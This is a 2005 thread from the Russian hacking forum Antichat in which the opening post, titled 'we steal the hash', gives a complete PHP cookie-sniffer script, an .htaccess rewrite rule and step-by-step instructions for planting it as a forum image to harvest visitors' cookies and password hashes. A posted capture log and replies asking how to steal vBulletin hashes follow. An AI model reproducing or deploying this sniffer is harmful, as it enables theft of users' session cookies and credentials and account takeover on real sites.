Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   php sniffer (https://forum.antichat.xyz/showthread.php?t=10399)

degeneration x 29.10.2005 22:39

Воруем хэш!
 
Подходит для всех форумов.

1. Регимся на jino-net.ru
2. Загружаем туда файлы :
image.gif
sniff.php
.htaccess
log.txt


Image.gif - любое изображение.
Sniff.php должен быть след. содержания:

PHP код:

<?  $log="log.txt";  $file fopen ($log"a+");  $qu=UrlDecode(getenv('QUERY_STRING'));  $ref=UrlDecode(getenv('HTTP_REFERER'));  $ip=getenv('REMOTE_ADDR');  $brow=getenv('HTTP_USER_AGENT');  $upc=getenv('REMOTE_HOST');  $cookie=getenv('HTTP_COOKIE');  $now getdate();   $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds'];  $str="[$nowstring] IP=$ip Cookie=$cookie Browser=$brow REFERER=$ref QUERY=$qu\n";  fputs ($file$str);  fclose($file);  header('Location: image.gif');  ?>

.htaccess такого содержания:
Код:

RewriteEngine On
RewriteRule image.gif sniff.php

Далее пишем на форуме:
в тэге IMG пишем линк к image.gif

На log.txt ставин chmod 777 и всё!
Куки у нас!

w4rd3n 29.10.2005 23:15

оффтоп очень удобное окошко с php кодом...

*Van* 29.10.2005 23:29

<На log.txt ставин chmod 777 и всё!

Что это значит и как это делать?

ZaCo 29.10.2005 23:37

Да ты просто гений! ))))
Правда это работает так же как и снифак на ачате... но эт неважно!
А сказать прикол? кроме реферера ничего к тебе не придёт! там должна быть хсс что сразу отметает из 100% 90% =))))

ZaCo 29.10.2005 23:39

2Ван никсовая команда chmod... тут он меняет права доступа к файлу

degeneration x 29.10.2005 23:51

Цитата:

Сообщение от ZaCo
Да ты просто гений! ))))
А сказать прикол? кроме реферера ничего к тебе не придёт!

Да ладно? Ко мне уже приходили куки с форума ipb 2.0.4

degeneration x 29.10.2005 23:58

Вот что пришло:
Код:

[29.10.2005 23:54:16] IP=xxxxxxx Cookie=bbmode=0; anonlogin=-1; member_id=2; pass_hash=65ab52b200fdcc7f2c80d60bb1cc9bff; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1130599467%3B%7D Browser=Opera/8.50 (Windows NT 5.1; U; ru) REFERER=http://xxxxxxxxxxxxxxxx QUERY=

ZaCo 29.10.2005 23:58

2degeneration x: хз. там понимаешь штука со снифаком какая - когда ты его запихиваешь например в <IMG> тебе необходимо(для получения куксов) прикреплять ещё и document.cookie это можно сделать только с помощью хсс! Ну сам подумай так бы все сайты ломались

tester 30.10.2005 16:21

на phpbb это не работает

w4rd3n 30.10.2005 16:23

Для phpbb эксплойтов просто завались...

tester 30.10.2005 16:32

и с IPB не приходит не хера путного:) так что не могло чудику прийти pass_hash= сам подписал не бось :D

Nova 30.10.2005 17:02

:confused: :D

Kond4r 30.10.2005 17:07

Это один из многих способов... Если на форуме можно дать линк на свою аватару, то проблемм нет. А вот если идёт прямая загрузка, то жопа(

kolorom 03.11.2005 21:12

караул
 
Что в любом случае? даже если в поосте дать линк на фотку или из подписи? :confused:

Шас проверю ...

$ZLO$ 03.11.2005 21:48

а как можно украсть хеш в локалке?

Jenizix 03.11.2005 23:24

kolorom, нет... Kond4r имел ввиду када ты можеш в профиле указать линк на твой аватар. имхо.
$ZLO$, жжош! а отчего хеш то хоть?

GreenBear 03.11.2005 23:52

2 страницы бреда.
Куки будут только с того домена, на котором находится картинка!!!
В данном случае с сайта, на котором и лежит наша картинки, ну и рефер, что ничего не даст, конечно если повезет, то даст сессию :)

*Van* 04.11.2005 00:18

Green_Bear, давно хотел спросить-помню ты давал какому-то челу совет по взлому fastbb путем xss с аватарой. Так вот как ты говоришь, "Куки будут только с того домена, на котором находится картинка!!!" .Да, это так, в чем я не раз убеждался. Тогда как можно взломать этой xss fastbb, если там аватары загружаются на сервер borda?

FHT 06.11.2005 15:06

А как спереть хеш от vBulletin 3.5.0???
Пытался увести с помошью сниффера как описано, но куки не приходят.

$ZLO$ 06.11.2005 17:27

Цитата:

Сообщение от ShturmBanFurrer
А как спереть хеш от vBulletin 3.5.0???
Пытался увести с помошью сниффера как описано, но куки не приходят.

Во меня этот вопрос тоже интересует.......

К.е.Н 06.11.2005 18:12

Да это уже известно 100лет

FHT 07.11.2005 00:29

Цитата:

Сообщение от К.е.Н
Да это уже известно 100лет

Ну и как? Как угнать хеши с vBulletin 3.5.0?
Знаешь-объясни.

NIGHT_WOLF 07.11.2005 08:53

Почему то мне кажеться что в этой новой версии булки уязвимостей ещё нет.

Tikson 07.11.2005 11:02

вобщем у кого-то получилось у когото нет, вообще описанная техника какят-о сложно реализуемая , чем плох обычный xss? а ???

*Van* 07.11.2005 11:08

Цитата:

Сообщение от Tikson
вобщем у кого-то получилось у когото нет, вообще описанная техника какят-о сложно реализуемая , чем плох обычный xss? а ???

Какую xss ты имеешь в виду? С аватарой?

xdx 18.01.2006 00:46

где же ты такой тег вставил =) вот у меня
[17.1.2006 23:53:8] IP=xxx.xxx.xxx.xxx. Cookie= Browser=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322) REFERER=http://www.ne dam.ru/index.php?showtopic=4&st=1700&#entry27081
Это максимум :)
Вот так без * т.к. форум принимает за Imag-ешку
Код:

[i*mg]http://ne dam.jino-net.ru/s/image.gif[/i*mg]

ISRAEL 21.01.2006 22:39

Нармално но надо бы добавить было ещё "REAL_REMOTE_ADDR"

$realip=getenv('REAL_REMOTE_ADDR');

:)


Время: 18:14